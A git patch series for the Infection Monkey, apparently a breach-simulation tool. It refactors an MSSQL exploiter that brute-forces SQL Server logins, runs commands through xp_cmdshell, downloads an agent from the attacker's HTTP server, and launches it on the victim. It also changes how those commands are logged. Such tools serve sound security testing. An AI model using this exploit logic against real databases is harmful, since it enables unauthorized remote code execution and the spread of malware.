From 95acfc36adcf70496e8f9a0c6f7fc4540bee8678 Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Wed, 15 Jun 2022 08:30:46 -0400 Subject: [PATCH 1/2] Agent: Remove MSSQL temporary file and directory This temporary file was only needed when commands were subject to 128 character limit. Writing commands to a batch file and executing it was a way to run larger commands. Now that we know single quotes circumvent this limit, the temporary file and directory are no longer necessary. --- monkey/infection_monkey/exploit/mssqlexec.py | 45 ++++---------------- 1 file changed, 8 insertions(+), 37 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 1827a5281..af3cdfb84 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -28,10 +28,6 @@ class MSSQLExploiter(HostExploiter): QUERY_BUFFER = 0.5 SQL_DEFAULT_TCP_PORT = "1433" - # Temporary file that saves commands for monkey's download and execution. - TMP_FILE_NAME = "tmp_monkey.bat" - TMP_DIR_PATH = PureWindowsPath("%temp%") / "tmp_monkey_dir" - # Single quotes are escaped in SQL by using two of them. # Example: 'It ain''t over ''til it''s over' AGENT_DOWNLOAD_COMMAND = ( @@ -43,7 +39,6 @@ class MSSQLExploiter(HostExploiter): super().__init__() self.cursor = None self.agent_http_path = None - self.payload_file_path = MSSQLExploiter.TMP_DIR_PATH / MSSQLExploiter.TMP_FILE_NAME def _exploit_host(self) -> ExploiterResultData: agent_path_on_victim = get_agent_dst_path(self.host) @@ -67,10 +62,8 @@ class MSSQLExploiter(HostExploiter): return self.exploit_result try: - self._create_temp_dir() self._upload_agent(agent_path_on_victim) self._run_agent(agent_path_on_victim) - self._remove_temp_dir() except Exception as e: error_message = ( f"An unexpected error occurred when trying " @@ -145,17 +138,10 @@ class MSSQLExploiter(HostExploiter): "Bruteforce process failed on host: {0}".format(self.host.ip_addr) ) - def _create_temp_dir(self): - logger.debug(f"Creating a temporary directory: {MSSQLExploiter.TMP_DIR_PATH}") - - mkdir_command = f"mkdir {MSSQLExploiter.TMP_DIR_PATH}" - self._run_mssql_command(mkdir_command) - def _upload_agent(self, agent_path_on_victim: PureWindowsPath): http_thread = self._start_agent_server(agent_path_on_victim) - self._write_download_command_to_batch_file(agent_path_on_victim) - self.run_payload_file() + self._run_agent_download_command(agent_path_on_victim) MSSQLExploiter._stop_agent_server(http_thread) @@ -165,20 +151,11 @@ class MSSQLExploiter(HostExploiter): ) return http_thread - @staticmethod - def _stop_agent_server(http_thread: LockedHTTPServer): - http_thread.stop() - http_thread.join(LONG_REQUEST_TIMEOUT) - - def _write_download_command_to_batch_file(self, agent_path_on_victim: PureWindowsPath): + def _run_agent_download_command(self, agent_path_on_victim: PureWindowsPath): agent_download_command = MSSQLExploiter.AGENT_DOWNLOAD_COMMAND.format( http_path=self.agent_http_path, dst_path=str(agent_path_on_victim) ) - self._write_command_to_batch_file(agent_download_command) - - def _write_command_to_batch_file(self, command: str): - write_to_file_command = f"{self.payload_file_path}" - self._run_mssql_command(write_to_file_command) + self._run_mssql_command(agent_download_command) def _run_mssql_command(self, command: str): logger.debug(f"Running command on SQL Server: {command}") @@ -188,16 +165,14 @@ class MSSQLExploiter(HostExploiter): sleep(MSSQLExploiter.QUERY_BUFFER) - def run_payload_file(self): - self._run_mssql_command(str(self.payload_file_path)) + @staticmethod + def _stop_agent_server(http_thread: LockedHTTPServer): + http_thread.stop() + http_thread.join(LONG_REQUEST_TIMEOUT) def _run_agent(self, agent_path_on_victim: PureWindowsPath): - self._write_agent_launch_command_to_batch_file(agent_path_on_victim) - self.run_payload_file() - - def _write_agent_launch_command_to_batch_file(self, agent_path_on_victim: PureWindowsPath): agent_launch_command = self._build_agent_launch_command(agent_path_on_victim) - self._write_command_to_batch_file(agent_launch_command) + self._run_mssql_command(agent_launch_command) def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str: agent_args = build_monkey_commandline( @@ -205,7 +180,3 @@ class MSSQLExploiter(HostExploiter): ) return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}" - - def _remove_temp_dir(self): - self._run_mssql_command(f"del {self.payload_file_path}") - self._run_mssql_command(f"rmdir {MSSQLExploiter.TMP_DIR_PATH}") From 4e71f4b6e40ab4731f0b26908b20b3b03d604c01 Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Wed, 15 Jun 2022 08:45:56 -0400 Subject: [PATCH 2/2] Agent: Improve MSSQL command logging --- monkey/infection_monkey/exploit/mssqlexec.py | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index af3cdfb84..75c369ecf 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -158,9 +158,11 @@ class MSSQLExploiter(HostExploiter): self._run_mssql_command(agent_download_command) def _run_mssql_command(self, command: str): - logger.debug(f"Running command on SQL Server: {command}") + sql_server_command = f"xp_cmdshell '{command}'" - self.cursor.execute(f"xp_cmdshell '{command}'") + logger.debug(f"Running command on SQL Server: {sql_server_command}") + + self.cursor.execute(sql_server_command) self.add_executed_cmd(command) sleep(MSSQLExploiter.QUERY_BUFFER)